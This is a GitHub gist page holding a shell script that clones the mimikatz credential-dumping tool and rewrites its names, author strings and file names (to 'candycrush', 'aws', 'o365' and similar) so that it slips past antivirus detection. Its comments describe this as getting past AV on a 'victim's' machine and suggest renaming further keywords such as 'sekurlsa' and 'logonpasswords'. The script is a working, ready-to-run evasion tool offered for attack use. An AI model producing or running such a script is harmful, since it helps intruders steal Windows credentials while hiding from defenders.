Skip to content

Instantly share code, notes, and snippets.

@michiiii
Forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Created November 23, 2021 13:28
Show Gist options
  • Save michiiii/2c7ff77d64613898fb832e79088b012d to your computer and use it in GitHub Desktop.
Save michiiii/2c7ff77d64613898fb832e79088b012d to your computer and use it in GitHub Desktop.
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/Thorsten/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Mueller/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/benjamin@gentilkiwi.com/thorsten.mueller@gmail.com/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/creativecommons/powerpoint/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/o365/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/KIWI/AWS/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Aws/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/kiwi/aws/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/A La Vie, A L/Good choice/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/vincent.letoux@gmail.com/latourde.delux@gmail.com/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/benjamin/theodor/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin DELPY/theodor preuss/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/oe.eo/whoot/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/pingcastle.com/google.com/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/mysmartlogon.com/facebook.com/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/Vincent LE TOUX/another name/g'
find windows/ -type f -name '*mimikatz*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/mimikatz/candycrush/g')";
mv "${FILE}" "${newfile}";
done
find windows/ -type f -name '*kiwi*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/kiwi/aws/g')";
mv "${FILE}" "${newfile}";
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment